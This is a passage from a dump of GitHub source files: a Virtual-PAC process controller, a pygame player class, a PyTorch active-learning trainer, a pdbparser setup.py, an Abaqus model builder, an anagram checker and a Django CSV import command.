'continuous' in self.tests:\n if self.tests['continuous']['running']:\n self.stopContinuous()\n if 'sequencer' in self.tests:\n if self.tests['sequencer']['running']:\n self.stopSequencer()\n self.tests['sequencer'] = {}\n self.tests['sequencer']['command'] = f'{Python_Executable} {Python_buildPath}/sequencer.py'\n self.tests['sequencer']['process'] = subprocess.Popen(self.tests['sequencer']['command'], shell=True)\n self.tests['sequencer']['running'] = True\n\n def stopSequencer(self,):\n if 'sequencer' not in self.tests:\n return\n self.tests['sequencer']['running'] = False\n self.send_signal_by_name(self.tests['sequencer']['command'], psutil.signal.SIGTERM)\n\n def runContinuous(self):\n if 'continuous' in self.tests:\n if self.tests['continuous']['running']:\n print('Continuous already running')\n self.updateContinuous()\n return\n self.tests['continuous'] = {}\n 
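# Note (editor's inference): the full command line doubles as the key for\n        # send_signal_by_name(), which matches processes by their psutil cmdline,\n        # so stopContinuous() and updateContinuous() can signal this child later.\n        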
self.tests['continuous']['command'] = f'{Python_Executable} {Python_buildPath}/continuous.py'\n self.tests['continuous']['process'] = subprocess.Popen(self.tests['continuous']['command'], shell=True)\n self.tests['continuous']['running'] = True\n\n def updateContinuous(self,):\n if 'continuous' not in self.tests:\n return\n if self.tests['continuous']['running']:\n self.send_signal_by_name(self.tests['continuous']['command'], psutil.signal.SIGUSR1)\n\n def stopContinuous(self):\n if 'continuous' not in self.tests:\n return\n self.tests['continuous']['running'] = False\n self.send_signal_by_name(self.tests['continuous']['command'], psutil.signal.SIGTERM)\n\n def runSniffer(self):\n with open(\"networkSetup.yaml\", \"r\") as file:\n conf = yaml.safe_load(file)['GoNetwork']\n self.sniffer['config'] = conf\n self.sniffer['command'] = f\"{C_buildPath}/sniffer {conf['macSrc']} {conf['goId']} {getIface()} {'0'}\"\n self.sniffer['process'] = subprocess.Popen(self.sniffer['command'], shell=True)\n self.sniffer['running'] = True\n\n def stopSniffer(self):\n if self.sniffer['running']:\n self.send_signal_by_name(self.sniffer['command'], psutil.signal.SIGTERM)\n self.sniffer['running'] = False\n\n def restartSniffer(self):\n if self.sniffer['running']:\n with open(\"networkSetup.yaml\", \"r\") as file:\n _conf = yaml.safe_load(file)['GoNetwork']\n if _conf != self.sniffer['config']:\n self.stopSniffer()\n self.runSniffer()\n\n def cleanSniffer(self):\n pass\n\n def stopTests(self, name):\n if name in ['continuous', 'all']:\n self.stopContinuous()\n elif name in ['sequencer', 'all']:\n self.stopSequencer()\n\n def stopAll(self):\n self.stopTests('all')\n self.stopSniffer()\n self.stopAPI()\n\ndef stop(signal1 , signal2):\n x.stopAll()\n cleanUp()\n controllerShm.unlink()\n exit(0)\n\nsignal.signal(signal.SIGINT, stop)\nsignal.signal(signal.SIGTERM, stop)\n\npreload()\nx = vMU_Brain()\nsignal.signal(signal.SIGUSR1, x.API_Handler)\n\n# x.runContinuous()\n\nwhile(1):\n time.sleep(1)\n\n# x.stopContinuous()\n\ncleanUp()\n\n\n# x.runContinuous()\n\n# t0 = time.time()\n# while time.time() - t0 < 120:\n# pass","repo_name":"Alailton-jr/Virtual-PAC","sub_path":"vMU/controler.py","file_name":"controler.py","file_ext":"py","file_size_in_byte":6920,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"4044159935","text":"import pygame\nfrom pygame.constants import K_a, K_d, K_s, K_w\nfrom pygame import Rect\nfrom math import pi, atan2, floor\nfrom weaponController import WeaponController, WeaponTypes\nfrom utils.spriteUtils import GetFramesFromFile\nfrom utils.constants import PLAYER_SIZE, PLAYER_HITBOX_SIZE, TILES_COUNT_X, TILE_SIZE, DATA_PATH\n\nSPEED = 2\nANIMATION_SPEED = 84 # ms\n\nclass Player:\n def __init__(self, game, gameworld):\n self.game = game\n self.gameworld = gameworld\n self.screenSize = pygame.display.get_window_size()\n\n spawn = self.gameworld.FindPlayerSpawn()\n self.posX, self.posY = spawn[0], spawn[1]\n\n self.walkingFrames = GetFramesFromFile(\"playerUnarmed.png\", PLAYER_SIZE)\n self.pistolFrames = GetFramesFromFile(\"playerPistol.png\", PLAYER_SIZE)\n self.rifleFrames = GetFramesFromFile(\"playerRifle.png\", PLAYER_SIZE)\n self.sniperFrames = GetFramesFromFile(\"playerSniper.png\", PLAYER_SIZE)\n self.lmgFrames = GetFramesFromFile(\"playerLmg.png\", PLAYER_SIZE)\n self.animFrameCounter = 0\n self.nextFrameTime = 0\n\n self.image = self.walkingFrames[0]\n self.rotatedImage = self.image\n\n self.weaponController = 
WeaponController(self, gameworld)\n self.weaponInventory = [WeaponTypes.CROWBAR]\n self.equippedWeaponIndex = 0\n self.ammo = 0\n\n self.SetAnimation(self.weaponInventory[self.equippedWeaponIndex])\n\n def Move(self, pressedKeys):\n self.isMoving = pressedKeys[K_w] or pressedKeys[K_a] or pressedKeys[K_s] or pressedKeys[K_d]\n\n if pressedKeys[K_w]:\n if(not self.CheckCollisionWithObstacles(Rect(self.posX + PLAYER_HITBOX_SIZE[0] / 2, self.posY + PLAYER_HITBOX_SIZE[1] / 2 - SPEED, PLAYER_HITBOX_SIZE[0], PLAYER_HITBOX_SIZE[1]))):\n if (self.posY < self.screenSize[1] / 2):\n self.gameworld.IncreaseOffsetY(SPEED)\n else:\n self.posY -= SPEED\n \n if pressedKeys[K_a]:\n self.posX -= SPEED\n if (self.CheckCollisionWithObstacles(Rect(self.posX + PLAYER_HITBOX_SIZE[0] / 2, self.posY + PLAYER_HITBOX_SIZE[1] / 2, PLAYER_HITBOX_SIZE[0], PLAYER_HITBOX_SIZE[1]))):\n self.posX += SPEED\n \n if pressedKeys[K_s]:\n if (self.posY + SPEED < self.screenSize[1] - PLAYER_SIZE[1]):\n self.posY += SPEED\n if (self.CheckCollisionWithObstacles(Rect(self.posX + PLAYER_HITBOX_SIZE[0] / 2, self.posY + PLAYER_HITBOX_SIZE[1] / 2, PLAYER_HITBOX_SIZE[0], PLAYER_HITBOX_SIZE[1]))):\n self.posY -= SPEED\n\n if pressedKeys[K_d]:\n self.posX += SPEED\n if (self.CheckCollisionWithObstacles(Rect(self.posX + PLAYER_HITBOX_SIZE[0] / 2, self.posY + PLAYER_HITBOX_SIZE[1] / 2, PLAYER_HITBOX_SIZE[0], PLAYER_HITBOX_SIZE[1]))):\n self.posX -= SPEED\n\n currentTime = pygame.time.get_ticks()\n\n if (currentTime >= self.nextFrameTime and self.isMoving):\n self.nextFrameTime = currentTime + ANIMATION_SPEED\n self.NextFrame()\n\n currentHitbox = Rect(PLAYER_HITBOX_SIZE[0] / 2 + self.posX, PLAYER_HITBOX_SIZE[1] / 2 + self.posY, PLAYER_HITBOX_SIZE[0], PLAYER_HITBOX_SIZE[1])\n\n if (self.game.frameCounter % 2 == 0 and self.CheckCollisionWithMonsters(currentHitbox)): # Check collisions with monsters on even frames\n self.game.levelController.savedDeaths += 1\n self.gameworld.entitySounds[\"playerDeath\"].play()\n self.game.TriggerGameOver(False)\n elif (self.game.frameCounter % 2 == 1): # Check collisions with collectables on odd frames\n self.CheckCollisionWithCollectables(currentHitbox)\n\n def SetAnimation(self, currentWeapon): # Change animations based on weapon held\n if currentWeapon == WeaponTypes.REVOLVER:\n self.currentAnimation = self.pistolFrames\n elif currentWeapon == WeaponTypes.RIFLE:\n self.currentAnimation = self.rifleFrames\n elif currentWeapon == WeaponTypes.SNIPER:\n self.currentAnimation = self.sniperFrames\n elif currentWeapon == WeaponTypes.LMG:\n self.currentAnimation = self.lmgFrames\n else:\n self.currentAnimation = self.walkingFrames\n\n self.NextFrame() # Start new animation\n \n def NextFrame(self): # Switch to the animation's next frame\n self.animFrameCounter = (self.animFrameCounter + 1) % len(self.currentAnimation)\n self.image = self.currentAnimation[self.animFrameCounter]\n\n def LookAtMouse(self, mousePos):\n relativeX, relativeY = mousePos[0] - (PLAYER_SIZE[0] / 2 + self.posX), mousePos[1] - (PLAYER_SIZE[1] / 2 + self.posY)\n self.angle = (180 / pi) * -atan2(relativeY, relativeX)\n self.rotatedImage = pygame.transform.rotate(self.image, floor(self.angle))\n \n def SwitchWeapon(self, nextWeapon):\n if (nextWeapon): # Switch to next weapon\n self.equippedWeaponIndex = (self.equippedWeaponIndex + 1) % len(self.weaponInventory)\n else: # Switch to previous weapon\n self.equippedWeaponIndex = self.equippedWeaponIndex - 1 if (self.equippedWeaponIndex > 0) else len(self.weaponInventory) - 1\n\n 
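# Worked example of the wrap-around above: with 3 weapons, index 2 goes\n        # to 0 when switching forward and index 0 goes to 2 when switching\n        # back, so the inventory cycles in both directions.\n        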
self.SetAnimation(self.weaponInventory[self.equippedWeaponIndex])\n\n def AddWeapon(self, ammo, duplicateAmmo, weapon):\n if (weapon not in self.weaponInventory):\n self.ammo += ammo\n self.weaponInventory.append(weapon)\n self.equippedWeaponIndex = len(self.weaponInventory) - 1\n self.SetAnimation(self.weaponInventory[self.equippedWeaponIndex])\n else:\n self.ammo += duplicateAmmo\n\n def Attack(self):\n if (self.weaponController.Attack(self.ammo)):\n self.ammo -= 1\n\n def GetPos(self):\n return [self.posX, self.posY]\n\n def GetEquippedWeaponName(self):\n return self.weaponController.weapons[self.weaponInventory[self.equippedWeaponIndex]][0]\n \n def CheckCollisionWithObstacles(self, mainRect):\n playerTileId = (TILES_COUNT_X * floor(self.posY / TILE_SIZE)) + (floor(self.posX / TILE_SIZE))\n\n for y in range(-1, 3): # Only checks obstacles in a 4x4 square around the player\n for x in range(-1, 3):\n checkedTileId = y * TILES_COUNT_X + x + playerTileId\n\n if (checkedTileId in self.gameworld.obstacles and mainRect.colliderect(self.gameworld.obstacles[checkedTileId].hitbox)):\n return True\n\n return False\n\n def CheckCollisionWithMonsters(self, mainRect):\n for monster in self.gameworld.monsters.values():\n if mainRect.colliderect(monster.hitbox):\n return True\n\n return False\n \n def CheckCollisionWithCollectables(self, mainRect):\n for collectable in self.gameworld.collectables.values():\n if not collectable.collected:\n if mainRect.colliderect(Rect(collectable.posX, collectable.posY, collectable.size[0], collectable.size[1])):\n collectable.Pickup()\n return # Max one pickup per frame\n\n def Draw(self, screen):\n self.weaponController.Draw(screen)\n screen.blit(self.rotatedImage, (self.posX, self.posY))\n\n '''# Debug info - Uncomment to show hitboxes : \n pygame.draw.rect(screen, (255, 0, 0), Rect(PLAYER_HITBOX_SIZE[0] / 2 + self.posX, PLAYER_HITBOX_SIZE[1] / 2 + self.posY, PLAYER_HITBOX_SIZE[0], PLAYER_HITBOX_SIZE[1]), 2) #'''","repo_name":"itsseraphii/Transgenesis","sub_path":"scripts/entities/player.py","file_name":"player.py","file_ext":"py","file_size_in_byte":7535,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"38322251494","text":"import numpy as np\nimport torch\nimport torch.nn.functional as F\nimport torch.optim as optim\nfrom torch.utils.data import DataLoader\nimport sys\n\n\nclass Strategy:\n def __init__(self, X, Y, idxs_lb, net, handler, args):\n self.X = X\n self.Y = Y\n self.idxs_lb = idxs_lb\n self.net = net\n self.handler = handler\n self.args = args\n self.n_pool = len(Y)\n use_cuda = torch.cuda.is_available()\n self.device = torch.device(\"cuda\" if use_cuda else \"cpu\")\n self.train_losses = []\n self.val_losses = []\n self.train_acc = []\n self.val_acc = []\n self.valX = None\n self.valY = None\n def query(self, n):\n pass\n #test data set\n def set_test_data(self, x, y):\n self.valX = x \n self.valY = y\n def update(self, idxs_lb):\n self.idxs_lb = idxs_lb\n\n def _train(self, epoch, loader_tr, optimizer):\n self.clf.train()\n total_number = len(loader_tr)\n update_rate = 5\n \n # Initiate accuracies and losses per epoch\n final_train_accuracy = 0\n final_train_loss = 0\n final_val_loss = 0\n final_val_acc = 0\n\n for batch_idx, (x, y, idxs) in enumerate(loader_tr):\n x, y = x.to(self.device), y.to(self.device)\n optimizer.zero_grad()\n out, e1 = self.clf(x)\n loss = F.cross_entropy(out, torch.max(y, 1)[1])\n loss.backward()\n optimizer.step()\n if batch_idx % update_rate==0:\n if(batch_idx > 
0):\n erase_line()\n progress = batch_idx / total_number * 100\n acc = accuracy_quick(out, y)\n final_train_accuracy = acc\n final_train_loss = loss\n print('Training\\t Progress:\\t %f %%\\tLoss: %f\\t Training Accuracy %0.2f %%' %(progress, loss, acc))\n\n #Validation Load the test data and compute loss and accuracy\n loader_te = DataLoader(self.handler(self.valX, self.valY, transform=self.args['transform']),\n shuffle=False, **self.args['loader_te_args'])\n\n self.clf.eval()\n loss = 0\n n = 0\n predictions = torch.zeros(len(self.valY), dtype=self.valY.dtype)\n with torch.no_grad():\n for x, y, idxs in loader_te:\n x, y = x.to(self.device), y.to(self.device)\n out, e1 = self.clf(x)\n loss += F.cross_entropy(out, torch.max(y, 1)[1])\n n += 1\n pred = out.max(1)[1]\n predictions[idxs] = pred.cpu()\n \n final_val_acc = 100.0 * (torch.max(self.valY, 1)[1]==predictions).sum().item() / len(self.valY)\n final_val_loss = 1.0 * loss/n\n print('\\nValidation\\n=========\\nProgress:\\t 100 %%\\nValidation Loss: %f\\nValidation Accuracy %0.2f %%\\n' %( final_val_loss, final_val_acc))\n return final_train_loss, final_val_loss, final_train_accuracy, final_val_acc\n \n def train(self):\n\n n_epoch = self.args['n_epoch']\n self.clf = self.net().to(self.device)\n optimizer = optim.SGD(self.clf.parameters(), **self.args['optimizer_args'])\n\n idxs_train = np.arange(self.n_pool)[self.idxs_lb]\n loader_tr = DataLoader(self.handler(self.X[idxs_train], self.Y[idxs_train], transform=self.args['transform']),\n shuffle=True, **self.args['loader_tr_args'])\n \n for epoch in range(1, n_epoch+1):\n print(\"=\"*100 + '\\n')\n print('Epoch %d of %d' %(epoch, n_epoch))\n train_loss, val_loss, train_acc, val_acc = self._train(epoch, loader_tr, optimizer)\n\n def predict(self, X, Y):\n loader_te = DataLoader(self.handler(X, Y, transform=self.args['transform']),\n shuffle=False, **self.args['loader_te_args'])\n\n self.clf.eval()\n P = torch.zeros(len(Y), dtype=Y.dtype)\n with torch.no_grad():\n for x, y, idxs in loader_te:\n x, y = x.to(self.device), y.to(self.device)\n out, e1 = self.clf(x)\n\n pred = out.max(1)[1]\n P[idxs] = pred.cpu()\n\n return P\n\n def predict_prob(self, X, Y):\n loader_te = DataLoader(self.handler(X, Y, transform=self.args['transform']),\n shuffle=False, **self.args['loader_te_args'])\n\n self.clf.eval()\n probs = torch.zeros([len(Y), len(np.unique(Y))])\n with torch.no_grad():\n for x, y, idxs in loader_te:\n x, y = x.to(self.device), y.to(self.device)\n out, e1 = self.clf(x)\n prob = F.softmax(out, dim=1)\n probs[idxs] = prob.cpu()\n \n return probs\n\n","repo_name":"Kartos102/artificial-intelligence","sub_path":"goverment_trace/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":4774,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"20898804165","text":"\"\"\"\r\nIn order to work properly, this script must be put one layer/folder/directory\r\noutside of pdbparser package directory.\r\n\"\"\"\r\ntry:\r\n from setuptools import setup\r\nexcept:\r\n from distutils.core import setup\r\nimport fnmatch\r\nfrom distutils.util import convert_path\r\nimport os, sys, glob\r\n\r\n# set package path and name\r\nPACKAGE_PATH = '.'\r\nPACKAGE_NAME = 'pdbparser'\r\n\r\n# check python version\r\nmajor, minor = sys.version_info[:2]\r\nif major==2 and minor!=7:\r\n raise RuntimeError(\"Python version 2.7.x or >=3.x is required.\")\r\n\r\n# automatically create MANIFEST.in\r\ncommands = [# include MANIFEST.in\r\n '# include this file, 
to ensure we can recreate source distributions',\r\n 'include MANIFEST.in',\r\n # exclude all .log files\r\n '\\n# exclude all logs',\r\n 'global-exclude *.log',\r\n # exclude all pdbparserParams files\r\n '\\n# exclude all pdbparserParams files',\r\n 'global-exclude *pdbparserParams.*',\r\n # exclude all other non necessary files\r\n '\\n# exclude all other non necessary files ',\r\n 'global-exclude .project',\r\n 'global-exclude .pydevproject',\r\n # exclude all of the subversion metadata\r\n '\\n# exclude all of the subversion metadata',\r\n 'global-exclude *.svn*',\r\n 'global-exclude .svn/*',\r\n 'global-exclude *.git*',\r\n 'global-exclude .git/*',\r\n # include all LICENSE files\r\n '\\n# include all license files found',\r\n 'global-include %s/*LICENSE.*'%PACKAGE_NAME,\r\n # include all README files\r\n '\\n# include all readme files found',\r\n 'global-include %s/*README.*'%PACKAGE_NAME,\r\n 'global-include %s/*readme.*'%PACKAGE_NAME]\r\nwith open('MANIFEST.in','w') as fd:\r\n for l in commands:\r\n fd.write(l)\r\n fd.write('\\n')\r\n\r\n# declare classifiers\r\nCLASSIFIERS = \"\"\"\\\r\nDevelopment Status :: 4 - Beta\r\nIntended Audience :: Science/Research\r\nIntended Audience :: Developers\r\nLicense :: OSI Approved :: GNU Affero General Public License v3\r\nProgramming Language :: Python :: 2.7\r\nProgramming Language :: Python :: 3\r\nTopic :: Software Development\r\nTopic :: Software Development :: Build Tools\r\nTopic :: Scientific/Engineering\r\nOperating System :: Microsoft :: Windows\r\nOperating System :: POSIX\r\nOperating System :: Unix\r\nOperating System :: MacOS\r\n\"\"\"\r\n\r\n# create descriptions\r\nLONG_DESCRIPTION = [\"It's a Protein Data Bank (.pdb) files manipulation package that is mainly developed to parse and load, duplicate, manipulate and create pdb files.\",\r\n \"A full description of a pdb file can be found here: http://deposit.rcsb.org/adit/docs/pdb_atom_format.html\",\r\n \"pdbparser atoms configuration can be visualized by vmd software (http://www.ks.uiuc.edu/Research/vmd/) by simply pointing 'VMD_PATH' global variable to the exact path of vmd executable, and using 'visualize' method.\",\r\n \"At any time and stage of data manipulation, a pdb file of all atoms or a subset of atoms can be exported to a pdb file.\"]\r\nDESCRIPTION = [ LONG_DESCRIPTION[0] ]\r\n\r\n## get package info\r\nPACKAGE_INFO={}\r\ninfoPath = convert_path('__pkginfo__.py')\r\nwith open(infoPath) as fd:\r\n exec(fd.read(), PACKAGE_INFO)\r\n\r\n\r\n##############################################################################################\r\n##################################### USEFUL DEFINITIONS #####################################\r\nDATA_EXCLUDE = ('*.py', '*.pyc', '*~', '.*', '*.so', '*.pyd')\r\nEXCLUDE_DIRECTORIES = ('*svn','*git','dist', 'EGG-INFO', '*.egg-info',)\r\n\r\ndef is_package(path):\r\n return (os.path.isdir(path) and os.path.isfile(os.path.join(path, '__init__.py')))\r\n\r\ndef get_packages(path, base=\"\", exclude=None):\r\n if exclude is None:\r\n exclude = []\r\n assert isinstance(exclude, (list, set, tuple)), \"exclude must be a list\"\r\n exclude = [os.path.abspath(e) for e in exclude]\r\n packages = {}\r\n for item in os.listdir(path):\r\n d = os.path.join(path, item)\r\n if sum([e in os.path.abspath(d) for e in exclude]):\r\n continue\r\n if is_package(d):\r\n if base:\r\n module_name = \"%(base)s.%(item)s\" % vars()\r\n else:\r\n module_name = item\r\n packages[module_name] = d\r\n packages.update(get_packages(d, module_name, exclude))\r\n return packages\r\n\r\ndef find_package_data(where='.', package='', exclude=DATA_EXCLUDE,\r\n exclude_directories=EXCLUDE_DIRECTORIES,\r\n only_in_packages=True, show_ignored=False):\r\n out = {}\r\n stack = [(convert_path(where), '', package, only_in_packages)]\r\n while stack:\r\n where, prefix, package, only_in_packages = stack.pop(0)\r\n for name in os.listdir(where):\r\n fn = os.path.join(where, name)\r\n if os.path.isdir(fn):\r\n bad_name = False\r\n for pattern in exclude_directories:\r\n if (fnmatch.fnmatchcase(name, pattern)\r\n or fn.lower() == pattern.lower()):\r\n bad_name = True\r\n if show_ignored:\r\n sys.stderr.write(\"Directory %s ignored by pattern %s\\n\" % (fn, pattern))\r\n break\r\n if bad_name:\r\n continue\r\n if (os.path.isfile(os.path.join(fn, '__init__.py')) and not prefix):\r\n if not package:\r\n new_package = name\r\n else:\r\n new_package = package + '.' + name\r\n stack.append((fn, '', new_package, False))\r\n else:\r\n stack.append((fn, prefix + name + '/', package, only_in_packages))\r\n elif package or not only_in_packages:\r\n # is a file\r\n bad_name = False\r\n for pattern in exclude:\r\n if (fnmatch.fnmatchcase(name, pattern)\r\n or fn.lower() == pattern.lower()):\r\n bad_name = True\r\n if show_ignored:\r\n sys.stderr.write(\"File %s ignored by pattern %s\\n\" % (fn, pattern))\r\n break\r\n if bad_name:\r\n continue\r\n out.setdefault(package, []).append(prefix+name)\r\n return out\r\n\r\n\r\ndef find_data(where=\".\", exclude=DATA_EXCLUDE, exclude_directories=EXCLUDE_DIRECTORIES, prefix=\"\"):\r\n out = {}\r\n stack = [convert_path(where)]\r\n while stack:\r\n where = stack.pop(0)\r\n for name in os.listdir(where):\r\n fn = os.path.join(where, name)\r\n d = os.path.join(prefix,os.path.dirname(fn))\r\n if os.path.isdir(fn):\r\n stack.append(fn)\r\n else:\r\n bad_name = False\r\n for pattern in exclude:\r\n if (fnmatch.fnmatchcase(name, pattern) or fn.lower() == pattern.lower()):\r\n bad_name = True\r\n break\r\n if bad_name:\r\n continue\r\n out.setdefault(d, []).append(fn)\r\n out = [(k,v) for k, v in out.items()]\r\n return out\r\n\r\n################################## END OF USEFUL DEFINITIONS #################################\r\n##############################################################################################\r\n\r\n\r\n# get packages\r\nPACKAGES = get_packages(path=PACKAGE_PATH, base='pdbparser',\r\n exclude=(os.path.join(PACKAGE_NAME,\"AMD\"),\r\n os.path.join(PACKAGE_NAME,\"docs\")))\r\nPACKAGES[PACKAGE_NAME] = '.'\r\n\r\n# create meta data\r\nmetadata = dict(name = PACKAGE_NAME,\r\n packages=PACKAGES.keys(),\r\n package_dir=PACKAGES,\r\n version= PACKAGE_INFO['__version__'] ,\r\n author=\"Bachir AOUN\",\r\n author_email=\"bachir.aoun@e-aoun.com\",\r\n description = \"\\n\".join(DESCRIPTION),\r\n long_description = \"\\n\".join(LONG_DESCRIPTION),\r\n #url = \"\",\r\n #download_url = \"\",\r\n license = 'GNU',\r\n classifiers=[_f for _f in CLASSIFIERS.split('\\n') if _f],\r\n platforms = [\"Windows\", \"Linux\", \"Solaris\", \"Mac OS-X\", \"Unix\"],\r\n # Dependent packages (distributions)\r\n install_requires=['pysimplelog','pypref'], # it also needs numpy, but this is left for the user to install.\r\n setup_requires=[],\r\n zip_safe=False,\r\n )\r\n\r\n# setup\r\nsetup(**metadata)\r\n","repo_name":"bachiraoun/pdbparser","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":8767,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"}
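+A minimal sketch, assuming the definitions in the setup.py record above: find_package_data is defined there but its result is never passed to setup(); one hypothetical hookup ('package_data' is a standard setuptools keyword, and running from the package root is assumed) would be the following lines placed just before the setup(**metadata) call.
+# hypothetical usage of the find_package_data helper defined in the record above
+PACKAGE_DATA = find_package_data(where='.', package=PACKAGE_NAME, show_ignored=False)
+metadata['package_data'] = PACKAGE_DATA  # metadata is the dict later expanded into setup(**metadata)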
+{"seq_id":"7299600627","text":"from abqimport import *\nimport setpe\nimport setas\nfrom getgeom import XCALIB, XHAUSER\n\ndef buildBase(baseModelName='both'):\n \"\"\"\n Build the plane strain model / axisymmetric model / both models, and \n delete the original Model-1 or Model-2 etc.\n \n Parameters\n ----------\n baseModelName : str\n Name of the base model, either 'pe' or 'as', or 'both'.\n \"\"\"\n if baseModelName == 'pe':\n setpe.setpe(xcontact=XCALIB)\n elif baseModelName=='as':\n setas.setas(xcontact=XHAUSER)\n elif baseModelName=='both':\n setpe.setpe(xcontact=XCALIB)\n setas.setas(xcontact=XHAUSER)\n for modelName in mdb.models.keys():\n if modelName.startswith('Model-'):\n del mdb.models[modelName]\n return\n","repo_name":"yw5aj/HS2014","sub_path":"createmodel/buildbase.py","file_name":"buildbase.py","file_ext":"py","file_size_in_byte":759,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"19722558448","text":"def merge_sort(string):\n \"\"\"Write the code here.\"\"\"\n # Verify if string is empty\n if len(string) == 0:\n return ''\n\n # Lower case string and verify if string has only one character\n case_string = string.lower()\n if len(case_string) <= 1:\n return case_string\n\n # Split string in two parts\n mid = len(case_string) // 2\n left = case_string[:mid]\n right = case_string[mid:]\n\n # Recursive call\n left_half = merge_sort(left)\n right_half = merge_sort(right)\n\n # Merge\n sorted_string = \"\"\n i = j = 0\n # Compare left and right half indexes\n while i < len(left_half) and j < len(right_half):\n if left_half[i] < right_half[j]: # If left index is lower than right,\n sorted_string += left_half[i] # add left index to sorted string\n i += 1\n else:\n sorted_string += right_half[j] # If right index is lower than left,\n j += 1 # add right index to sorted string\n\n # Add remaining indexes to sorted string\n sorted_string += left_half[i:]\n sorted_string += right_half[j:]\n\n return sorted_string\n\n\ndef is_anagram(first_string, second_string):\n \"\"\"Write the code here.\"\"\"\n # Call merge_sort function to sort strings\n first_string_sorted = merge_sort(first_string)\n second_string_sorted = merge_sort(second_string)\n anagram = False\n\n # Verify if strings are anagrams\n if first_string_sorted == second_string_sorted:\n anagram = True\n # Verify if strings are empty\n if first_string_sorted == '' or second_string_sorted == '':\n anagram = False\n\n return (first_string_sorted, second_string_sorted, anagram)\n","repo_name":"danillo-expedito/project-algorithms","sub_path":"challenges/challenge_anagrams.py","file_name":"challenge_anagrams.py","file_ext":"py","file_size_in_byte":1691,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"74864582771","text":"import os\nfrom subprocess import call\nimport sys\n\n\n\ndef save_used_cfg(cfg, used_cfg_file):\n with open(used_cfg_file, 'a') as f:\n cfg_str = cfg_string(cfg)\n f.write('%s\\n' % cfg_str)\n\n\ndef run(cfg_file, scriptName):\n\n flags = '--%s %s' % ('config', cfg_file)\n call('python ' + scriptName + '.py' +' %s' % flags, shell=True)\n \n\nif __name__ == "__main__":\n\n run(sys.argv[1], sys.argv[2])\n \n \n\n","repo_name":"trxuanha/2swsa","sub_path":"do_exp.py","file_name":"do_exp.py","file_ext":"py","file_size_in_byte":441,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"37944327927","text":"from __future__ import annotations
\n\nimport asyncio\nimport threading\nfrom typing import Any, Dict\n\n\nclass State(Dict[str, Any]):\n \"\"\"\n An object that can be used to store arbitrary state.\n \"\"\"\n\n def __enter__(self):\n if not hasattr(self, \"sync_lock\"):\n self.sync_lock = threading.Lock()\n self.sync_lock.acquire()\n return self\n\n def __exit__(self, exc_type, value, traceback):\n self.sync_lock.release()\n\n async def __aenter__(self):\n if not hasattr(self, \"async_lock\"):\n self.async_lock = asyncio.Lock()\n await self.async_lock.acquire()\n return self\n\n async def __aexit__(self, exc_type, value, traceback):\n self.async_lock.release()\n\n def __setattr__(self, name: Any, value: Any) -> None:\n self[name] = value\n\n def __getattr__(self, name: Any) -> Any:\n try:\n return self[name]\n except KeyError:\n message = \"'{}' object has no attribute '{}'\"\n raise AttributeError(message.format(self.__class__.__name__, name))\n\n def __delattr__(self, name: Any) -> None:\n del self[name]\n","repo_name":"abersheeran/kui","sub_path":"kui/utils/state.py","file_name":"state.py","file_ext":"py","file_size_in_byte":1139,"program_lang":"python","lang":"en","doc_type":"code","stars":276,"dataset":"github-code","pt":"21"} +{"seq_id":"14538178112","text":"import pandas as pd\n\nfrom django.core.management.base import BaseCommand\n\nfrom reviews.models import (Genre, Title, Category, GenreTitle,\n User, Review, Comment)\n\n\nclass Command(BaseCommand):\n\n df_genre = pd.read_csv('static/data/genre.csv')\n df_category = pd.read_csv('static/data/category.csv')\n df_title = pd.read_csv('static/data/titles.csv')\n df_genre_title = (\n pd.read_csv('static/data/genre_title.csv')\n .rename(columns={'genre_id': 'genre', 'title_id': 'title'})\n )\n df_user = pd.read_csv('static/data/users.csv')[['id',\n 'username',\n 'email',\n 'role']]\n df_review = (pd.read_csv('static/data/review.csv')\n .rename(columns={'title_id': 'title'}))\n df_comment = pd.read_csv('static/data/comments.csv')\n df = {\n 'genre': (df_genre, Genre, 'slug'),\n 'category': (df_category, Category, 'slug'),\n 'title': (df_title, Title, 'id'),\n 'genre_title': (df_genre_title, GenreTitle, 'id'),\n 'author': (df_user, User, 'id'),\n 'review': (df_review, Review, 'id'),\n 'comment': (df_comment, Comment, 'id')\n }\n\n def correct_df(self, data, name):\n data.dropna(inplace=True)\n data.drop_duplicates(name, inplace=True)\n\n def check_all_df(self):\n \"\"\"Drop duplicates of potential keys and empty values.\"\"\"\n for tek in self.df:\n self.correct_df(self.df[tek][0], self.df[tek][2])\n\n def data_translate(self, data):\n \"\"\"Convert object ids into objects.\"\"\"\n for el in data:\n if el in ['genre', 'category']:\n df_t = self.df[el][0] # Dataset of the corresponding element\n class_el = self.df[el][1]\n el_id = data[el]\n if el_id in df_t['id'].values:\n slug = df_t.set_index('id').loc[el_id, 'slug']\n data[el] = class_el.objects.get(slug=slug)\n else:\n return None\n\n if el in ['author', 'title', 'review']:\n df_t = self.df[el][0] # Dataset of the corresponding element\n class_el = self.df[el][1]\n el_id = data[el]\n if el_id in df_t['id'].values:\n data[el] = class_el.objects.get(pk=el_id)\n else:\n return None\n\n return data\n\n def handle(self, *args, **options):\n\n self.check_all_df()\n\n for elem in self.df:\n df_t = self.df[elem][0]\n class_t = self.df[elem][1]\n class_t.objects.all().delete()\n\n for ind in df_t.index:\n data = df_t.loc[ind].to_dict()\n data = self.data_translate(data)\n if data:\n if elem in ['genre', 'category']:
